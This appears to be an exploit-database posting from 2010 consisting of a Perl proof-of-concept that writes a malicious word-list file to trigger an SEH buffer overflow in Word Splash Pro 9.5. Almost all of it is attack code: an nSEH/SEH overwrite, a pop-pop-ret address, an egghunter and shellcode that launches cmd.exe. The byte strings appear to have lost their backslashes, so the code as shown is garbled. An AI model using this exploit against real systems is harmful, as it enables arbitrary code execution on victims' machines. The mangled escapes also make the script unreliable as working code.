Word Splash Pro 9.5 Buffer Overflow
Posted on 20 December 2010
# Exploit Title: Word Splash Pro <= 9.5 Buffer Overflow -EggHunter- # Software Link: http://www.chronasoft.com/software/wordsplashpro # Version: <= 9.5 # Tested on: Win XP SP3 French # Date: 20/12/2010 # Author: h1ch4m #Email: h1ch4m@live.fr #Home: Net-Effects.blogspot.com #Greetz : Peter Van Eeckhoutte, Exploit-Database Team, Zhir0 #Note: tested on version 9.5 & 8.3, you may have to change the address of pop pop ret according to your sp & the program version # triggering details: file->Word list->Import then click on Word List Builder button my $file = "1.wsl"; my $size = 4112; my $nseh = "xebx06x90x90"; # jump 6 bytes my $seh = pack('V', 0x01de44dc); # pop pop ret from CRDE2000.DLL my $egg = "w00tw00t"; my $egghunter = "x66x81xCAxFFx0Fx42x52x6Ax02x58xCDx2Ex3Cx05x5Ax74xEFxB8". "x77x30x30x74". "x8BxFAxAFx75xEAxAFx75xE7xFFxE7"; # Shellcode : windows/XP sp2 (FR) Sellcode cmd.exe 32 bytes - Mountassif Moad aka Stack # http://www.exploit-db.com/exploits/13510/ my $shellcode = "x8BxECx33xFFx57". "xC6x45xFCx63xC6x45". "xFDx6DxC6x45xFEx64". "xC6x45xF8x01x8D". "x45xFCx50xB8xC7x93". "xBFx77xFFxD0"; my $junk = "x90" x ($size-length($egg.$shellcode)); open($FILE,">$file"); print $FILE $egg.$shellcode.$junk.$nseh.$seh.$egghunter; close($FILE); print "File Created successfully "; sleep(1);
